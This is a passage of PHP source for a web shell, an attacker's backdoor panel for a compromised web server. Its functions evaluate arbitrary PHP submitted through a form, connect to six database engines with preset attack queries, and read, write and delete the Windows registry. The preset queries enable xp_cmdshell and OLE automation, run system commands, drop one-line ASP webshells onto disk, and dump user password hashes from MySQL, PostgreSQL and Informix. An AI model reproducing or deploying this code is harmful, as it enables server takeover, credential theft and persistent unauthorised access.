|
|||
|
|
}
|
|||
|
|
echo "</tr>";
|
|||
|
|
}
|
|||
|
|
echo "</table>";
|
|||
|
|
mysql_free_result($result);
|
|||
|
|
}
|
|||
|
|
else $MSG_BOX .= mysql_error();
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
echo '<br>'.$MSG_BOX.'</div></center></form>';
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
//eval php code
|
|||
|
|
function phpcode()
|
|||
|
|
{
|
|||
|
|
|
|||
|
|
print<<<END
|
|||
|
|
<html>
|
|||
|
|
<br />
|
|||
|
|
<div class="actall"><h5>user define php code:<h5><br></div>
|
|||
|
|
<form action="?s=x" method="POST">
|
|||
|
|
<div class="actall"><textarea name="phpcode" rows="20" cols="80">print_r(apache_get_modules());/*get apache modules which have openned*/</textarea></div><br />
|
|||
|
|
<div><input class="bt" type="submit" value="EVAL"></div></form>
|
|||
|
|
</html>
|
|||
|
|
END;
|
|||
|
|
$phpcode = $_POST['phpcode'];
|
|||
|
|
$phpcode = trim($phpcode);
|
|||
|
|
if($phpcode){
|
|||
|
|
if (!preg_match('#<\?#si',$phpcode)){
|
|||
|
|
$phpcode = "<?php\n\n{$phpcode}\n\n?>";
|
|||
|
|
}
|
|||
|
|
eval("?".">$phpcode<?");
|
|||
|
|
echo '<br><br>';
|
|||
|
|
}
|
|||
|
|
return false;
|
|||
|
|
}
|
|||
|
|
//other db connector
|
|||
|
|
function otherdb(){
|
|||
|
|
$db = isset($_GET['db']) ? $_GET['db'] : '';
|
|||
|
|
print<<<END
|
|||
|
|
<form method="POST" name="dbform" id="dbform" action="?s=w&db={$db}" enctype="multipart/form-data">
|
|||
|
|
<div class="actall"><a href="?s=w">   psotgresql  </a>
|
|||
|
|
<a href="?s=w&db=ms">   mssql  </a>
|
|||
|
|
<a href="?s=w&db=ora">   oracle  </a>
|
|||
|
|
<a href="?s=w&db=ifx">   informix  </a>
|
|||
|
|
<a href="?s=w&db=fb">   firebird  </a>
|
|||
|
|
<a href="?s=w&db=db2">  db2  </a></div></form>
|
|||
|
|
END;
|
|||
|
|
|
|||
|
|
if ($db=="ms"){
|
|||
|
|
$mshost = isset($_POST['mshost']) ? $_POST['mshost'] : 'localhost';
|
|||
|
|
$msuser = isset($_POST['msuser']) ? $_POST['msuser'] : 'sa';
|
|||
|
|
$mspass = isset($_POST['mspass']) ? $_POST['mspass'] : 'sa123';
|
|||
|
|
$msdbname = isset($_POST['msdbname']) ? $_POST['msdbname'] : 'master';
|
|||
|
|
$msaction = isset($_POST['action']) ? $_POST['action'] : '';
|
|||
|
|
$msquery = isset($_POST['mssql']) ? $_POST['mssql'] : '';
|
|||
|
|
$msquery = stripslashes($msquery);
|
|||
|
|
print<<<END
|
|||
|
|
<form method="POST" name="msform" action="?s=w&db=ms">
|
|||
|
|
<div class="actall">Host:<input type="text" name="mshost" value="{$mshost}" style="width:100px">
|
|||
|
|
User:<input type="text" name="msuser" value="{$msuser}" style="width:100px">
|
|||
|
|
Pass:<input type="text" name="mspass" value="{$mspass}" style="width:100px">
|
|||
|
|
Dbname:<input type="text" name="msdbname" value="{$msdbname}" style="width:100px"><br><br>
|
|||
|
|
<script language="javascript">
|
|||
|
|
function msFull(i){
|
|||
|
|
Str = new Array(11);
|
|||
|
|
Str[0] = "";
|
|||
|
|
Str[1] = "select @@version;";
|
|||
|
|
Str[2] = "select name from sysdatabases;";
|
|||
|
|
Str[3] = "select name from sysobject where type='U';";
|
|||
|
|
Str[4] = "select name from syscolumns where id=Object_Id('table_name');";
|
|||
|
|
Str[5] = "Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll');";
|
|||
|
|
Str[6] = "Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll');";
|
|||
|
|
Str[7] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;";
|
|||
|
|
Str[8] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;";
|
|||
|
|
Str[9] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;";
|
|||
|
|
Str[10] = "Exec master.dbo.xp_cmdshell 'net user';";
|
|||
|
|
Str[11] = "Declare @s int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^<%execute(request(char(35)))%^> > c:\\\\1.asp';";
|
|||
|
|
Str[12] = "sp_makewebtask @outputfile='d:\\\\web\\\\bin.asp',@charset=gb2312,@query='select ''<%execute(request(chr(35)))%>''' ";
|
|||
|
|
msform.mssql.value = Str[i];
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
</script>
|
|||
|
|
<textarea name="mssql" style="width:600px;height:200px;">{$msquery}</textarea><br>
|
|||
|
|
<select onchange="return msFull(options[selectedIndex].value)">
|
|||
|
|
<option value="0" selected>command</option>
|
|||
|
|
<option value="1">version</option>
|
|||
|
|
<option value="2">databases</option>
|
|||
|
|
<option value="3">tables</option>
|
|||
|
|
<option value="4">columns</option>
|
|||
|
|
<option value="5">add sp_oacreate</option>
|
|||
|
|
<option value="6">add xp_cmdshell</option>
|
|||
|
|
<option value="7">add xp_cmdshell(2005)</option>
|
|||
|
|
<option value="8">add sp_oacreate(2005)</option>
|
|||
|
|
<option value="9">open openrowset(2005)</option>
|
|||
|
|
<option value="10">xp_cmdshell exec</option>
|
|||
|
|
<option value="10">sp_oamethod exec</option>
|
|||
|
|
<option value="11">sp_makewebtask</option>
|
|||
|
|
</select>
|
|||
|
|
<input type="hidden" name="action" value="msquery">
|
|||
|
|
<input class="bt" type="submit" value="Query"></div></form>
|
|||
|
|
END;
|
|||
|
|
|
|||
|
|
if ($msaction == 'msquery'){
|
|||
|
|
$msconn= mssql_connect ($mshost , $msuser, $mspass);
|
|||
|
|
mssql_select_db($msdbname,$msconn) or die("connect error :" .mssql_get_last_message());
|
|||
|
|
$msresult = mssql_query($msquery) or die(mssql_get_last_message());
|
|||
|
|
echo '<font face="verdana">';
|
|||
|
|
echo '<table border="1" cellpadding="1" cellspacing="2">';
|
|||
|
|
echo "\n<tr>\n";
|
|||
|
|
for ($i=0; $i<mssql_num_fields($msresult); $i++)
|
|||
|
|
{
|
|||
|
|
echo '<td bgcolor="#228B22"><b>'.
|
|||
|
|
mssql_field_name($msresult, $i);
|
|||
|
|
echo "</b></td>\n";
|
|||
|
|
}
|
|||
|
|
echo "</tr>\n";
|
|||
|
|
mssql_data_seek($result, 0);
|
|||
|
|
while ($msrow=mssql_fetch_row($msresult))
|
|||
|
|
{
|
|||
|
|
echo "<tr>\n";
|
|||
|
|
for ($i=0; $i<mssql_num_fields($msresult); $i++ )
|
|||
|
|
{
|
|||
|
|
echo '<td bgcolor="#B8B8E8">';
|
|||
|
|
echo "$msrow[$i]";
|
|||
|
|
echo '</td>';
|
|||
|
|
}
|
|||
|
|
echo "</tr>\n";
|
|||
|
|
}
|
|||
|
|
echo "</table>\n";
|
|||
|
|
echo "</font>";
|
|||
|
|
mssql_free_result($msresult);
|
|||
|
|
mssql_close();
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
elseif ($db=="ora"){
|
|||
|
|
$orahost = isset($_POST['orahost']) ? $_POST['orahost'] : 'localhost';
|
|||
|
|
$oraport = isset($_POST['oraport']) ? $_POST['oraport'] : '1521';
|
|||
|
|
$orauser = isset($_POST['orauser']) ? $_POST['orauser'] : 'root';
|
|||
|
|
$orapass = isset($_POST['orapass']) ? $_POST['orapass'] : '123456';
|
|||
|
|
$orasid = isset($_POST['orasid']) ? $_POST['orasid'] : 'ORCL';
|
|||
|
|
$oraaction = isset($_POST['action']) ? $_POST['action'] : '';
|
|||
|
|
$oraquery = isset($_POST['orasql']) ? $_POST['orasql'] : '';
|
|||
|
|
$oraquery = stripslashes($oraquery);
|
|||
|
|
print<<<END
|
|||
|
|
<form method="POST" name="oraform" action="?s=w&db=ora">
|
|||
|
|
<div class="actall">Host:<input type="text" name="orahost" value="{$orahost}" style="width:100px">
|
|||
|
|
Port:<input type="text" name="oraport" value="{$oraport}" style="width:50px">
|
|||
|
|
User:<input type="text" name="orauser" value="{$orauser}" style="width:80px">
|
|||
|
|
Pass:<input type="text" name="orapass" value="{$orapass}" style="width:100px">
|
|||
|
|
SID:<input type="text" name="orasid" value="{$orasid}" style="width:50px"><br><br>
|
|||
|
|
<script language="javascript">
|
|||
|
|
function oraFull(i){
|
|||
|
|
Str = new Array(8);
|
|||
|
|
Str[0] = "";
|
|||
|
|
Str[1] = "select version();";
|
|||
|
|
Str[2] = "show databases;";
|
|||
|
|
Str[3] = "show tables from db_name;";
|
|||
|
|
Str[4] = "show columns from table_name;";
|
|||
|
|
Str[5] = "select user,password from mysql.user;";
|
|||
|
|
Str[6] = "select load_file(0xxxxxxxxxxxxxxxxxxxxx);";
|
|||
|
|
Str[7] = "select 0xxxxx from mysql.user into outfile 'c:\\\\inetpub\\\\wwwroot\\\\test.php'";
|
|||
|
|
oraform.orasql.value = Str[i];
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
</script>
|
|||
|
|
<textarea name="orasql" style="width:600px;height:200px;">{$oraquery}</textarea><br>
|
|||
|
|
<select onchange="return oraFull(options[selectedIndex].value)">
|
|||
|
|
<option value="0" selected>command</option>
|
|||
|
|
<option value="1">version</option>
|
|||
|
|
<option value="2">databases</option>
|
|||
|
|
<option value="3">tables</option>
|
|||
|
|
<option value="4">columns</option>
|
|||
|
|
<option value="5">hashes</option>
|
|||
|
|
<option value="6">load_file</option>
|
|||
|
|
<option value="7">into outfile</option>
|
|||
|
|
</select>
|
|||
|
|
<input type="hidden" name="action" value="myquery">
|
|||
|
|
<input class="bt" type="submit" value="Query"></div></form>
|
|||
|
|
END;
|
|||
|
|
|
|||
|
|
if ($oraaction == 'oraquery'){
|
|||
|
|
$oralink = OCILogon($orauser,$orapass,"(DEscriptION=(ADDRESS=(PROTOCOL =TCP)(HOST=$orahost)(PORT = $oraport))(CONNECT_DATA =(SID=$orasid)))") or die(ocierror());
|
|||
|
|
$oraresult=ociparse($oralink,$oraquery) or die(ocierror());
|
|||
|
|
$orarow=oci_fetch_row($oraresult);
|
|||
|
|
echo '<font face="verdana">';
|
|||
|
|
echo '<table border="1" cellpadding="1" cellspacing="2">';
|
|||
|
|
echo "\n<tr>\n";
|
|||
|
|
for ($i=0; $i<oci_num_fields($oraresult); $i++)
|
|||
|
|
{
|
|||
|
|
echo '<td bgcolor="#228B22"><b>'.
|
|||
|
|
oci_field_name($oraresult, $i);
|
|||
|
|
echo "</b></td>\n";
|
|||
|
|
}
|
|||
|
|
echo "</tr>\n";
|
|||
|
|
ociresult($oraresult, 0);
|
|||
|
|
while ($orarow=ora_fetch_row($oraresult))
|
|||
|
|
{
|
|||
|
|
echo "<tr>\n";
|
|||
|
|
for ($i=0; $i<ora_num_fields($result); $i++ )
|
|||
|
|
{
|
|||
|
|
echo '<td bgcolor="#B8B8E8">';
|
|||
|
|
echo "$orarow[$i]";
|
|||
|
|
echo '</td>';
|
|||
|
|
}
|
|||
|
|
echo "</tr>\n";
|
|||
|
|
}
|
|||
|
|
echo "</table>\n";
|
|||
|
|
echo "</font>";
|
|||
|
|
oci_free_statement($oraresult);
|
|||
|
|
ocilogoff();
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
elseif ($db == "ifx"){
|
|||
|
|
$ifxuser = isset($_POST['ifxuser']) ? $_POST['ifxuser'] : 'root';
|
|||
|
|
$ifxpass = isset($_POST['ifxpass']) ? $_POST['ifxpass'] : '123456';
|
|||
|
|
$ifxdbname = isset($_POST['ifxdbname']) ? $_POST['ifxdbname'] : 'ifxdb';
|
|||
|
|
$ifxaction = isset($_POST['action']) ? $_POST['action'] : '';
|
|||
|
|
$ifxquery = isset($_POST['ifxsql']) ? $_POST['ifxsql'] : '';
|
|||
|
|
$ifxquery = stripslashes($ifxquery);
|
|||
|
|
print<<<END
|
|||
|
|
<form method="POST" name="ifxform" action="?s=w&db=ifx">
|
|||
|
|
<div class="actall">Dbname:<input type="text" name="ifxhost" value="{$ifxdbname}" style="width:100px">
|
|||
|
|
User:<input type="text" name="ifxuser" value="{$ifxuser}" style="width:100px">
|
|||
|
|
Pass:<input type="text" name="ifxpass" value="{$ifxpass}" style="width:100px"><br><br>
|
|||
|
|
<script language="javascript">
|
|||
|
|
function ifxFull(i){
|
|||
|
|
Str = new Array(11);
|
|||
|
|
Str[0] = "";
|
|||
|
|
Str[1] = "select dbservername from sysobjects;";
|
|||
|
|
Str[2] = "select name from sysdatabases;";
|
|||
|
|
Str[3] = "select tabname from systables;";
|
|||
|
|
Str[4] = "select colname from syscolumns where tabid=n;";
|
|||
|
|
Str[5] = "select username,usertype,password from sysusers;";
|
|||
|
|
ifxform.ifxsql.value = Str[i];
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
</script>
|
|||
|
|
<textarea name="ifxsql" style="width:600px;height:200px;">{$ifxquery}</textarea><br>
|
|||
|
|
<select onchange="return ifxFull(options[selectedIndex].value)">
|
|||
|
|
<option value="0" selected>command</option>
|
|||
|
|
<option value="1">dbservername</option>
|
|||
|
|
<option value="1">databases</option>
|
|||
|
|
<option value="2">tables</option>
|
|||
|
|
<option value="3">columns</option>
|
|||
|
|
<option value="4">hashes</option>
|
|||
|
|
</select>
|
|||
|
|
<input type="hidden" name="action" value="ifxquery">
|
|||
|
|
<input class="bt" type="submit" value="Query"></div></form>
|
|||
|
|
END;
|
|||
|
|
if ($ifxaction == 'ifxquery'){
|
|||
|
|
$ifxlink = ifx_connect($ifcdbname, $ifxuser, $ifxpass) or die(ifx_errormsg());
|
|||
|
|
$ifxresult = ifx_query($ifxquery,$ifxlink) or die (ifx_errormsg());
|
|||
|
|
$ifxrow=ifx_fetch_row($ifxresult);
|
|||
|
|
echo '<font face="verdana">';
|
|||
|
|
echo '<table border="1" cellpadding="1" cellspacing="2">';
|
|||
|
|
echo "\n<tr>\n";
|
|||
|
|
for ($i=0; $i<ifx_num_fields($ifxresult); $i++)
|
|||
|
|
{
|
|||
|
|
echo '<td bgcolor="#228B22"><b>'.
|
|||
|
|
ifx_fieldproperties($ifxresult);
|
|||
|
|
echo "</b></td>\n";
|
|||
|
|
}
|
|||
|
|
echo "</tr>\n";
|
|||
|
|
mysql_data_seek($ifxresult, 0);
|
|||
|
|
while ($ifxrow=ifx_fetch_row($ifxresult))
|
|||
|
|
{
|
|||
|
|
echo "<tr>\n";
|
|||
|
|
for ($i=0; $i<ifx_num_fields($ifxresult); $i++ )
|
|||
|
|
{
|
|||
|
|
echo '<td bgcolor="#B8B8E8">';
|
|||
|
|
echo "$ifxrow[$i]";
|
|||
|
|
echo '</td>';
|
|||
|
|
}
|
|||
|
|
echo "</tr>\n";
|
|||
|
|
}
|
|||
|
|
echo "</table>\n";
|
|||
|
|
echo "</font>";
|
|||
|
|
ifx_free_result($ifxresult);
|
|||
|
|
ifx_close();
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
elseif ($db=="db2"){
|
|||
|
|
$db2host = isset($_POST['db2host']) ? $_POST['db2host'] : 'localhost';
|
|||
|
|
$db2port = isset($_POST['db2port']) ? $_POST['db2port'] : '50000';
|
|||
|
|
$db2user = isset($_POST['db2user']) ? $_POST['db2user'] : 'root';
|
|||
|
|
$db2pass = isset($_POST['db2pass']) ? $_POST['db2pass'] : '123456';
|
|||
|
|
$db2dbname = isset($_POST['db2dbname']) ? $_POST['db2dbname'] : 'mysql';
|
|||
|
|
$db2action = isset($_POST['action']) ? $_POST['action'] : '';
|
|||
|
|
$db2query = isset($_POST['db2sql']) ? $_POST['db2sql'] : '';
|
|||
|
|
$db2query = stripslashes($db2query);
|
|||
|
|
print<<<END
|
|||
|
|
<form method="POST" name="db2form" action="?s=w&db=db2">
|
|||
|
|
<div class="actall">Host:<input type="text" name="db2host" value="{$db2host}" style="width:100px">
|
|||
|
|
Port:<input type="text" name="db2port" value="{$db2port}" style="width:60px">
|
|||
|
|
User:<input type="text" name="db2user" value="{$db2user}" style="width:100px">
|
|||
|
|
Pass:<input type="text" name="db2pass" value="{$db2pass}" style="width:100px">
|
|||
|
|
Dbname:<input type="text" name="db2dbname" value="{$db2dbname}" style="width:100px"><br><br>
|
|||
|
|
<script language="javascript">
|
|||
|
|
function db2Full(i){
|
|||
|
|
Str = new Array(4);
|
|||
|
|
Str[0] = "";
|
|||
|
|
Str[1] = "select schemaname from syscat.schemata;";
|
|||
|
|
Str[2] = "select name from sysibm.systables;";
|
|||
|
|
Str[3] = "select colname from syscat.columns where tabname='table_name';";
|
|||
|
|
Str[4] = "db2 get db cfg for db_name;";
|
|||
|
|
db2form.db2sql.value = Str[i];
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
</script>
|
|||
|
|
<textarea name="db2sql" style="width:600px;height:200px;">{$db2query}</textarea><br>
|
|||
|
|
<select onchange="return db2Full(options[selectedIndex].value)">
|
|||
|
|
<option value="0" selected>command</option>
|
|||
|
|
<option value="1">databases</option>
|
|||
|
|
<option value="1">tables</option>
|
|||
|
|
<option value="2">columns</option>
|
|||
|
|
<option value="3">db config</option>
|
|||
|
|
</select>
|
|||
|
|
<input type="hidden" name="action" value="db2query">
|
|||
|
|
<input class="bt" type="submit" value="Query"></div></form>
|
|||
|
|
END;
|
|||
|
|
if ($myaction == 'db2query'){
|
|||
|
|
//$db2string = "DRIVER={IBM DB2 ODBC DRIVER};DATABASE=$db2dbname;"."HOSTNAME=$db2host;PORT=$db2port;PROTOCOL=TCPIP;UID=$db2user;PWD=$db2pass;";
|
|||
|
|
$db2link = db2_connect($db2dbname, $db2user, $db2pass) or die(db2_conn_errormsg());
|
|||
|
|
$db2result = db2_exec($db2link,$db2query) or die(db2_stmt_errormsg());
|
|||
|
|
$db2row=db2_fetch_row($db2result);
|
|||
|
|
echo '<font face="verdana">';
|
|||
|
|
echo '<table border="1" cellpadding="1" cellspacing="2">';
|
|||
|
|
echo "\n<tr>\n";
|
|||
|
|
for ($i=0; $i<db2_num_fields($db2result); $i++)
|
|||
|
|
{
|
|||
|
|
echo '<td bgcolor="#228B22"><b>'.
|
|||
|
|
db2_field_name($db2result);
|
|||
|
|
echo "</b></td>\n";
|
|||
|
|
}
|
|||
|
|
echo "</tr>\n";
|
|||
|
|
while ($db2row=db2_fetch_row($db2result))
|
|||
|
|
{
|
|||
|
|
echo "<tr>\n";
|
|||
|
|
for ($i=0; $i<db2_num_fields($db2result); $i++ )
|
|||
|
|
{
|
|||
|
|
echo '<td bgcolor="#B8B8E8">';
|
|||
|
|
echo "$db2row[$i]";
|
|||
|
|
echo '</td>';
|
|||
|
|
}
|
|||
|
|
echo "</tr>\n";
|
|||
|
|
}
|
|||
|
|
echo "</table>\n";
|
|||
|
|
echo "</font>";
|
|||
|
|
db2_free_result($db2result);
|
|||
|
|
db2_close();
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
elseif($db == "fb") {
|
|||
|
|
$fbhost = isset($_POST['fbhost']) ? $_POST['fbhost'] : 'localhost';
|
|||
|
|
$fbpath = isset($_POST['fbpath']) ? $_POST['fbpath'] : '';
|
|||
|
|
$fbpath = str_replace("\\\\", "\\", $fbpath);
|
|||
|
|
$fbuser = isset($_POST['fbuser']) ? $_POST['fbuser'] : 'sysdba';
|
|||
|
|
$fbpass = isset($_POST['fbpass']) ? $_POST['fbpass'] : 'masterkey';
|
|||
|
|
$fbaction = isset($_POST['action']) ? $_POST['action'] : '';
|
|||
|
|
$fbquery = isset($_POST['fbsql']) ? $_POST['fbsql'] : '';
|
|||
|
|
$fbquery = stripslashes($fbquery);
|
|||
|
|
print<<<END
|
|||
|
|
<form method="POST" name="fbform" action="?s=w&db=fb">
|
|||
|
|
<div class="actall">Host:<input type="text" name="fbhost" value="{$fbhost}" style="width:100px">
|
|||
|
|
Path:<input type="text" name="fbpath" value="{$fbpath}" style="width:100px">
|
|||
|
|
User:<input type="text" name="fbuser" value="{$fbuser}" style="width:100px">
|
|||
|
|
Pass:<input type="text" name="fbpass" value="{$fbpass}" style="width:100px"><br/>
|
|||
|
|
<script language="javascript">
|
|||
|
|
function fbFull(i){
|
|||
|
|
Str = new Array(5);
|
|||
|
|
Str[0] = "";
|
|||
|
|
Str[1] = "select RDB\$RELATION_NAME from RDB\$RELATIONS;";
|
|||
|
|
Str[2] = "select RDB\$FIELD_NAME from RDB\$RELATION_FIELDS where RDB\$RELATION_NAME='table_name';";
|
|||
|
|
Str[3] = "input 'D:\\createtable.sql';";
|
|||
|
|
Str[4] = "shell netstat -an;";
|
|||
|
|
fbform.fbsql.value = Str[i];
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
</script>
|
|||
|
|
<textarea name="fbsql" style="width:600px;height:200px;">{$fbquery}</textarea><br>
|
|||
|
|
<select onchange="return fbFull(options[selectedIndex].value)">
|
|||
|
|
<option value="0" selected>command</option>
|
|||
|
|
<option value="1">tables</option>
|
|||
|
|
<option value="2">columns</option>
|
|||
|
|
<option value="3">import sql</option>
|
|||
|
|
<option value="4">shell</option>
|
|||
|
|
</select>
|
|||
|
|
<input type="hidden" name="action" value="fbquery">
|
|||
|
|
<input class="bt" type="submit" value="Query"></div></form>
|
|||
|
|
END;
|
|||
|
|
if ($fbaction == 'fbquery'){
|
|||
|
|
$fblink = ibase_connect($fbhost.':'.$fbpath,$fbuser,$fbpass) or die(ibase_errmsg());
|
|||
|
|
$fbresult = ibase_query($fblink,$fbquery) or die(ibase_errmsg());
|
|||
|
|
echo '<font face="verdana">';
|
|||
|
|
echo '<table border="1" cellpadding="1" cellspacing="2">';
|
|||
|
|
echo "\n<tr>\n";
|
|||
|
|
for ($i=0; $i<ibase_num_fields($fbresult); $i++)
|
|||
|
|
{
|
|||
|
|
echo '<td bgcolor="#228B22"><b>'.
|
|||
|
|
ibase_field_info($fbresult, $i);
|
|||
|
|
echo "</b></td>\n";
|
|||
|
|
}
|
|||
|
|
echo "</tr>\n";
|
|||
|
|
ibase_field_info($fbresult, 0);
|
|||
|
|
while ($fbrow=ibase_fetch_row($fbresult))
|
|||
|
|
{
|
|||
|
|
echo "<tr>\n";
|
|||
|
|
for ($i=0; $i<ibase_num_fields($fbresult); $i++ )
|
|||
|
|
{
|
|||
|
|
echo '<td bgcolor="#B8B8E8">';
|
|||
|
|
echo "$fbrow[$i]";
|
|||
|
|
echo '</td>';
|
|||
|
|
}
|
|||
|
|
echo "</tr>\n";
|
|||
|
|
}
|
|||
|
|
echo "</table>\n";
|
|||
|
|
echo "</font>";
|
|||
|
|
ibase_free_result($fbresult);
|
|||
|
|
ibase_close();
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
else{
|
|||
|
|
$pghost = isset($_POST['pghost']) ? $_POST['pghost'] : 'localhost';
|
|||
|
|
$pguser = isset($_POST['pguser']) ? $_POST['pguser'] : 'postgres';
|
|||
|
|
$pgpass = isset($_POST['pgpass']) ? $_POST['pgpass'] : '';
|
|||
|
|
$pgdbname = isset($_POST['pgdbname']) ? $_POST['pgdbname'] : 'postgres';
|
|||
|
|
$pgaction = isset($_POST['action']) ? $_POST['action'] : '';
|
|||
|
|
$pgquery = isset($_POST['pgsql']) ? $_POST['pgsql'] : '';
|
|||
|
|
$pgquery = stripslashes($pgquery);
|
|||
|
|
print<<<END
|
|||
|
|
<form method="POST" name="pgform" action="?s=w">
|
|||
|
|
<div class="actall">Host:<input type="text" name="pghost" value="{$pghost}" style="width:100px;">
|
|||
|
|
User:<input type="text" name="pguser" vaule="{$pguser}" style="width:100px">
|
|||
|
|
Pass:<input tyoe="text" name="pgpass" value="{$pgpass}" style="width:100px">
|
|||
|
|
Dbname:<input type="text" name="pgdbname" value="{$pgdbname}" style="width:100px"><br><br>
|
|||
|
|
<script language="javascript">
|
|||
|
|
function pgFull(i){
|
|||
|
|
Str = new Array(7);
|
|||
|
|
Str[0] = "";
|
|||
|
|
Str[1] = "select version();";
|
|||
|
|
Str[2] = "select datname from pg_database;";
|
|||
|
|
Str[3] = "select relname from pg_stat_user_tables limit 1 offset n;";
|
|||
|
|
Str[4] = "select column_name from information_schema.columns where table_name='xxx' limit 1 offset n;";
|
|||
|
|
Str[5] = "select usename,passwd from pg_shadow;";
|
|||
|
|
Str[6] = "select pg_file_read('pg_hba.conf',1,pg_file_length('pg_hb.conf'));";
|
|||
|
|
pgform.pgsql.value = Str[i];
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
</script>
|
|||
|
|
<textarea name="pgsql" style="width:600px;height:200px;">{$pgquery}</textarea><br>
|
|||
|
|
<select onchange="return pgFull(options[selectedIndex].value)">
|
|||
|
|
<option value="0" selected>command</option>
|
|||
|
|
<option value="1">version</option>
|
|||
|
|
<option value="2">databases</option>
|
|||
|
|
<option value="3">tables</option>
|
|||
|
|
<option value="4">columns</option>
|
|||
|
|
<option value="5">hashes</option>
|
|||
|
|
<option value="6">pg_hb.conf</option>
|
|||
|
|
</select>
|
|||
|
|
<input type="hidden" name="action" value="pgquery">
|
|||
|
|
<input class="bt" type="submit" value="Query"></div></form>
|
|||
|
|
END;
|
|||
|
|
|
|||
|
|
if ($pgaction == 'pgquery'){
|
|||
|
|
$pgconn = pg_connect("host=$pghost dbname=$pgdbname user=$pguser password=$pgpass ")
|
|||
|
|
or die( 'Could not connect: ' . pg_last_error());
|
|||
|
|
$pgresult = pg_query($pgquery) or die( 'Query failed: '.pg_last_error());
|
|||
|
|
$pgrow=pg_fetch_row($pgresult);
|
|||
|
|
echo '<font face="verdana">';
|
|||
|
|
echo '<table border="1" cellpadding="1" cellspacing="2">';
|
|||
|
|
echo "\n<tr>\n";
|
|||
|
|
for ($i=0; $i<pg_num_fields($pgresult); $i++)
|
|||
|
|
{
|
|||
|
|
echo '<td bgcolor="#228B22"><b>'.
|
|||
|
|
pg_field_name($pgresult, $i);
|
|||
|
|
echo "</b></td>\n";
|
|||
|
|
}
|
|||
|
|
echo "</tr>\n";
|
|||
|
|
pg_result_seek($pgresult, 0);
|
|||
|
|
while ($pgrow=pg_fetch_row($pgresult))
|
|||
|
|
{
|
|||
|
|
echo "<tr>\n";
|
|||
|
|
for ($i=0; $i<pg_num_fields($pgresult); $i++ )
|
|||
|
|
{
|
|||
|
|
echo '<td bgcolor="#B8B8E8">';
|
|||
|
|
echo "$pgrow[$i]";
|
|||
|
|
echo '</td>';
|
|||
|
|
}
|
|||
|
|
echo "</tr>\n";
|
|||
|
|
}
|
|||
|
|
echo "</table>\n";
|
|||
|
|
echo "</font>";
|
|||
|
|
pg_free_result($pgresult);
|
|||
|
|
pg_close();
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
//control Registry with php
|
|||
|
|
function phpreg(){
|
|||
|
|
$shell1 = new COM("wscript.shell") or die("require windows host");
|
|||
|
|
$action = isset($_POST['action']) ? $_POST['action'] : '';
|
|||
|
|
echo '<br>';
|
|||
|
|
echo '<div class="actall"><h5>Read & Write &Del reg</h5><br></div>';
|
|||
|
|
echo '<br>';
|
|||
|
|
print<<<END
|
|||
|
|
<TR><form action="" method="post">
|
|||
|
|
<div class="actall"><TD WIDTH=100 VALIGN=TOP ALIGN=CENTER>
|
|||
|
|
Rpath: <input type="hidden" name="action" value="read">
|
|||
|
|
<input type="text" name="rpath" value="{$rpath}" size="70">
|
|||
|
|
<input class="bt" type="submit" value="Read"></form></TD></TR><br><br></div>
|
|||
|
|
END;
|
|||
|
|
|
|||
|
|
$rpath = isset($_POST['rpath']) ? $_POST['rpath'] : '';
|
|||
|
|
$rpath = str_replace("\\\\", "\\", $rpath);
|
|||
|
|
if ($action=="read"){
|
|||
|
|
$out = $shell1->RegRead($rpath);
|
|||
|
|
echo '<pre>'.var_dump($out).'</pre>';
|
|||
|
|
echo '<br><br>';
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
print<<<END
|
|||
|
|
<TR><form action="" method="post">
|
|||
|
|
<div class="actall"><TD WIDTH=100 VALIGN=TOP ALIGN=CENTER>Wpath:
|
|||
|
|
<input type="text" name="wpath" value="{$wpath}" size="70"><BR><br>
|
|||
|
|
Wtype: <input type="text" name="wtype" value="{$wtype}" size="20">
|
|||
|
|
Wvalue: <input type="text" name="wvalue" value="{$wvalue}" size="30">
|
|||
|
|
<input type="hidden" name="action" value="write">
|
|||
|
|
<input class="bt" type="submit" value="write"></form></TD></TR><br><br><br></div>
|
|||
|
|
END;
|
|||
|
|
|
|||
|
|
$wpath = isset($_POST['wpath']) ? $_POST['wpath'] : '';
|
|||
|
|
$wpath = str_replace("\\\\", "\\", $wpath);
|
|||
|
|
$wtype = isset($_POST['wtype']) ? $_POST['wtype'] : '';
|
|||
|
|
$wvalue = isset($_POST['wvalue']) ? $_POST['wvalue'] : '';
|
|||
|
|
if ($action=="write"){
|
|||
|
|
$shell1->RegWrite($wpath, $wvalue, $wtype);
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
print<<<END
|
|||
|
|
<TR><form action="" method="post">
|
|||
|
|
<div class="actall"><TD WIDTH=100 VALIGN=TOP ALIGN=CENTER>
|
|||
|
|
Dpath:<input type="hidden" name="action" value="del">
|
|||
|
|
<input type="text" name="dpath" value="{$dpath}" size="70">
|
|||
|
|
<input class="bt" type="submit" value="Del"></form></TD></TR><br><br></div>
|
|||
|
|
END;
|
|||
|
|
|
|||
|
|
$dpath = isset($_POST['dpath']) ? $_POST['dpath'] : '';
|
|||
|
|
$dpath = str_replace("\\\\", "\\", $dpath);
|
|||
|
|
if ($action=="del"){
|
|||
|
|
